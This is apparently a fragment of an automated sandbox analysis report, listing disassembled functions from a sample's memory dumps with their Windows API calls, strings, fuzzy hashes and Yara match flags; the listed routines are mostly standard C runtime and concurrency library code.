                                                                                    Function 00A0E204 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61threadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00A121E4), ref: 00A0E220
                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00A121E4), ref: 00A0E25A
                                                                                    • RtlExitUserThread.NTDLL(00000000), ref: 00A0E261
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                                                    • String ID: 11@
                                                                                    • API String ID: 1079102050-1785270423
                                                                                    • Opcode ID: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
                                                                                    • Instruction ID: 63cead5fc892d1fc7a1cc4b30a0c1261911af173697b66506e4eef3d86fcca21
                                                                                    • Opcode Fuzzy Hash: 5e5341ce53e2f92f90f8bdb878e6b423528209b15d53d5dd393f874dedd460f1
                                                                                    • Instruction Fuzzy Hash: 90114C74A40308ABEF04FB70BE0BFED3764AF55B04F100969F9046B1D3DBB159809661
                                                                                    Function 0040EF4B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetLastError.KERNEL32(0000000D,?,0040DE66,0040C67E,?,?,00000000,?,0040C54E,0045D5E4,0040C51B,0045D5DC,?,ios_base::failbit set,0040C67E), ref: 0040EFCF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLast
                                                                                    • String ID: 11@$f(@
                                                                                    • API String ID: 1452528299-1277599000
                                                                                    • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                    • Instruction ID: 215b6f0c2c260135b977075f1765c75d61afaaca07cd8a2d2b7a33b83608daf3
                                                                                    • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                                                    • Instruction Fuzzy Hash: 24110236204117BFCF125F62DC4456BBB65FF08712B14443AF905AB290DA749820ABD5
                                                                                    Function 00425F1B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00425F2D
                                                                                      • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F17
                                                                                      • Part of subcall function 00424EFA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F2C
                                                                                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00425F60
                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00425F8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                                                    • String ID: 11@
                                                                                    • API String ID: 2684344702-1785270423
                                                                                    • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                                                    • Instruction ID: cb3a2859ed7aecbb53c8f7ff5db8590c6937c5e0b26f296ff23853c6e0f13c92
                                                                                    • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                                                    • Instruction Fuzzy Hash: CB01DB35700629ABCF01DF54D5808AE77B9EF89354B55006AEC06DB301DA34DE05DB60
                                                                                    Function 00A06182 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00A06194
                                                                                      • Part of subcall function 00A05161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00A0517E
                                                                                      • Part of subcall function 00A05161: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00A05193
                                                                                    • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00A061C7
                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00A061F2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                                                    • String ID: 11@
                                                                                    • API String ID: 2684344702-1785270423
                                                                                    • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                                                    • Instruction ID: 13d11dab1e052034e069dee10299674e96d821d78b3940a7ae29db64661970fb
                                                                                    • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                                                    • Instruction Fuzzy Hash: FB019675A0061DABCF05DF64D5809AE77FAEF89354B140065ED06EB342DA70EE059BA0
                                                                                    Function 0040D4EB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00411B62
                                                                                      • Part of subcall function 00410A71: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00410A84
                                                                                      • Part of subcall function 00410A71: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00410A8E
                                                                                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00411B7B
                                                                                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411BC1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                                                    • String ID: 11@
                                                                                    • API String ID: 2524916244-1785270423
                                                                                    • Opcode ID: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
                                                                                    • Instruction ID: 77abca4beb8e4c97e8764394de2025186321a16057fa486c0768a76d67dfeb06
                                                                                    • Opcode Fuzzy Hash: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
                                                                                    • Instruction Fuzzy Hash: D201D6359042248BDF11AB50C450BFDB372AF84714F1440AADA116B3A5DBBCBE41C799
                                                                                    Function 009ED752 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 009F1DC9
                                                                                      • Part of subcall function 009F0CD8: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 009F0CEB
                                                                                      • Part of subcall function 009F0CD8: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 009F0CF5
                                                                                    • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 009F1DE2
                                                                                    • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 009F1E28
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                                                    • String ID: 11@
                                                                                    • API String ID: 2524916244-1785270423
                                                                                    • Opcode ID: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
                                                                                    • Instruction ID: 4a414a012e4c9c4c3f28c00d3269b4dd255add39a8aad4985fe88b25daaaf0f8
                                                                                    • Opcode Fuzzy Hash: c968d17d0eadf1c0e28c283ecf804fc7f7f2f76cc6bcee2e82d4d123140e7899
                                                                                    • Instruction Fuzzy Hash: DA018C35A00228CBDF19AB64C8547BDB37AAFC4350F184055DA126B386CB74AD06CBD1
                                                                                    Function 0041DA2B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA73
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA81
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                    • String ID: 11@$pContext
                                                                                    • API String ID: 1687795959-1086721755
                                                                                    • Opcode ID: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                                                    • Instruction ID: 9010ffe1b6885ba769d18c3576365b3581292a7ba769087c8389302fb8d97d4f
                                                                                    • Opcode Fuzzy Hash: 96630a8d32283315eac16341535568e0e7a28a07d001f012752ce8a5bf4e8c9b
                                                                                    • Instruction Fuzzy Hash: B5F0593AB006159BCB04EB59DC45C5EF7A8AF85B64710007BFD01E3342CFB8EE058698
                                                                                    Function 00A1016B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleExW.KERNEL32(00000000,004496AC,00000000,?,?,?,00A1011C,00000000,?,00A100BC,00000000,00457970,0000000C,00A10213,00000000,00000002), ref: 00A1018B
                                                                                    • GetProcAddress.KERNEL32(00000000,004496C4), ref: 00A1019E
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,00A1011C,00000000,?,00A100BC,00000000,00457970,0000000C,00A10213,00000000,00000002), ref: 00A101C1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                    • String ID: 11@
                                                                                    • API String ID: 4061214504-1785270423
                                                                                    • Opcode ID: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                                                    • Instruction ID: 2bc5e584d4fb7fa007acef8d3a1171e55c1ed40792b0475d39177b39548ebaac
                                                                                    • Opcode Fuzzy Hash: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                                                    • Instruction Fuzzy Hash: F4F06834600218FFDB119F50DD49BEEBFB4EF45B12F150175F809A2150CBB99E80DA54
                                                                                    Function 009EC8A4 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009EC903
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throw
                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                    • API String ID: 2005118841-1866435925
                                                                                    • Opcode ID: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                                                    • Instruction ID: 4059e63142be6f720363e6877bfa63ab255e6af077e1016ade1d9108b54b6df6
                                                                                    • Opcode Fuzzy Hash: 952463f700e975f9eb06248a0959d2f411cd4c1788934f8d026916f96b121d51
                                                                                    • Instruction Fuzzy Hash: B6F021F3C0024C6BCB05E955CD42BEF379C6B05341F148456EDD666183E7689D07C794
                                                                                    Function 00428DEC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                                                    • ExitThread.KERNEL32 ref: 0042DFFA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                    • String ID: f(@
                                                                                    • API String ID: 3213686812-2560262586
                                                                                    • Opcode ID: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                                                    • Instruction ID: 69bc41ef776010156a50f9e736d675acab369240ea0dcafc6817c09100241395
                                                                                    • Opcode Fuzzy Hash: 77ac3720ff8c63f5b54c7ead9ba54d6db249791c5ee017c1279202a925d4012e
                                                                                    • Instruction Fuzzy Hash: 1FF0E260B8432639FA2037A2BD0BBAA16150F24B0DF96042BBE0A991C3DE9C9551416D
                                                                                    Function 00A20911 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog3_catchmake_shared
                                                                                    • String ID: MOC$RCC
                                                                                    • API String ID: 3472968176-2084237596
                                                                                    • Opcode ID: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                                                    • Instruction ID: f9e995c398efcf6b728d42fb0e338a96b5fd94b0d24f152253124dea499137f7
                                                                                    • Opcode Fuzzy Hash: c784227a34fd5b7084b2c87fc19ea1d0d793304ba4906a265f634d642bdce8b4
                                                                                    • Instruction Fuzzy Hash: B2F0627050012CCFDB21EF68E512A6D7BB4BF41B44F4980A2F4404B363CB789E94CBA1
                                                                                    Function 0042DF9D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00431F7D), ref: 0042DFB9
                                                                                    • GetLastError.KERNEL32(00457910,00000010,00000003,00431F7D), ref: 0042DFF3
                                                                                    • ExitThread.KERNEL32 ref: 0042DFFA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                                                    • String ID: f(@
                                                                                    • API String ID: 3213686812-2560262586
                                                                                    • Opcode ID: 7b9273de92e7b6936eaf880de14e0e220afece78540420b5bcfd49e854584d78
                                                                                    • Instruction ID: 0285dfc7d7792d99b816c6e179ba3485ab9a4e2f62b66e3f0321d916b514c371
                                                                                    • Opcode Fuzzy Hash: 7b9273de92e7b6936eaf880de14e0e220afece78540420b5bcfd49e854584d78
                                                                                    • Instruction Fuzzy Hash: EEF0557078432535FA203BA2BD0FB961A240F10B0EF56002BBF09991C3DEEC9690416D
                                                                                    Function 004242E7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 00424319
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042432B
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00424339
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                                                    • String ID: pScheduler
                                                                                    • API String ID: 1381464787-923244539
                                                                                    • Opcode ID: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                                                    • Instruction ID: dcb9093c936754fa26cda4c49a5e66a6ec85891f206a073b4e5aa53fece02954
                                                                                    • Opcode Fuzzy Hash: 34e1c130fc1cf947503754e169bfa26c3fbc22ee7f1814df8cddcc9c2b5f3f5b
                                                                                    • Instruction Fuzzy Hash: 23F0A731B0122467C718FB55E842D9E77B99E403087D0816FB802A3182CF7CA949C69D
                                                                                    Function 009FE8A4 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 009FE8C6
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 009FE8D9
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 009FE8E7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                                                    • String ID: 11@
                                                                                    • API String ID: 1990795212-1785270423
                                                                                    • Opcode ID: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                                                    • Instruction ID: 6e648cfcc41d491c94a06c19e5f143425589e43447be8e1a65e3660e2e0e359c
                                                                                    • Opcode Fuzzy Hash: a1f300e0f29ed94639b3e21e46aa6b462f5911b6182861392c7cf2f18a492d1f
                                                                                    • Instruction Fuzzy Hash: 0AE06835B0010C27CB00FB29EC06C6DBBADAEC0B503140026FA11A3393DFB4AE0986C8
                                                                                    Function 0042E05D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E073
                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?,0042E12D,00000000), ref: 0042E082
                                                                                    • _free.LIBCMT ref: 0042E089
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseFreeHandleLibrary_free
                                                                                    • String ID: -B
                                                                                    • API String ID: 621396759-1993606306
                                                                                    • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                    • Instruction ID: 17050b68875c52b9acd6c54ac6ffc846a702ed9b00f998fe1c0864977ee07d81
                                                                                    • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                                                    • Instruction Fuzzy Hash: E9E08632101A34AFD7315F57F808B57BBD4EF15722F54C52AE41911560C7B9AD82CB9C
                                                                                    Function 00415DAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DDA
                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DE8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                    • String ID: pScheduler$version
                                                                                    • API String ID: 1687795959-3154422776
                                                                                    • Opcode ID: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                                                    • Instruction ID: 654ef00f808b34ad7b75b8e59998346ebad61dbc4125ce9a21f33dce7aa536fc
                                                                                    • Opcode Fuzzy Hash: 4d660d84671934de918ba001a7b24dcb35a14defb486b3a9e887b252b602c9d4
                                                                                    • Instruction Fuzzy Hash: 5CE04F30900608F6CB14AA55D80ABDD77A45B11749F60C02B7855610D29ABCA6D8CB4A
                                                                                    Function 004358B8 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: __alldvrm$_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 1036877536-0
                                                                                    • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                    • Instruction ID: f9eb826db87fdf2ea4d980863b0040f81c60248b0af39ab0b887e88b27670142
                                                                                    • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                                                    • Instruction Fuzzy Hash: BEA14871A00B869FEB11DE18C8917AEFBE5EF19310F18426FE5859B381C27C9D41C799
                                                                                    Function 00A15B1F Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __alldvrm$_strrchr
                                                                                    • String ID:
                                                                                    • API String ID: 1036877536-0
                                                                                    • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                    • Instruction ID: b89291596e2c86922fa2462ae5908d363b779ce2d0064f065ee395dde20b18f4
                                                                                    • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                                                    • Instruction Fuzzy Hash: 0DA14672E04B86DFD715CF38D8817EEBBE5EFA2350F18416DE5859B281D6388981C790
                                                                                    Function 0043FA28 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174326271.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_jicQJ2cdlM.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                    • Instruction ID: 944ec9a8cfd15a85abea22ed7e483bbecdcf94b25d0ac16da2a86ed09b95ce29
                                                                                    • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                                                    • Instruction Fuzzy Hash: E8414771E00210AADB247BBBDC52ABF76A8EF4D334F14127BF418C6291D67C9D49826D
                                                                                    Function 00A1FC8F Relevance: 6.2, APIs: 4, Instructions: 152COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free
                                                                                    • String ID:
                                                                                    • API String ID: 269201875-0
                                                                                    • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                    • Instruction ID: d0f7318b816846d10d1d8655da6e4b9bd7209ce5b0ad1099b3af6e5d3e3b0687
                                                                                    • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                                                    • Instruction Fuzzy Hash: 39414D729001946FDB24AFBCAD46AFE37A4EF067B4F140635F818D61D1D73448C156A1
                                                                                    Function 00A16B24 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,00A1049A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 00A16B71
                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A16BFA
                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00A16C0C
                                                                                    • __freea.LIBCMT ref: 00A16C15
                                                                                      • Part of subcall function 00A1392E: RtlAllocateHeap.NTDLL(00000000,009EDAFC,00000000), ref: 00A13960
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.4174782860.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9e0000_jicQJ2cdlM.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                    • String ID:
                                                                                    • API String ID: 2652629310-0
                                                                                    • Opcode ID: abd3ea47fc0e6ec547c6b6e60874e5e084d68c1577f3dfc99b50f136594fac3b
                                                                                    • Instruction ID: c5728886d8d942db41e4516f8650135eba6aece848ba1f98d3921e168dd5d2da
                                                                                    • Opcode Fuzzy Hash: abd3ea47fc0e6ec547c6b6e60874e5e084d68c1577f3dfc99b50f136594fac3b
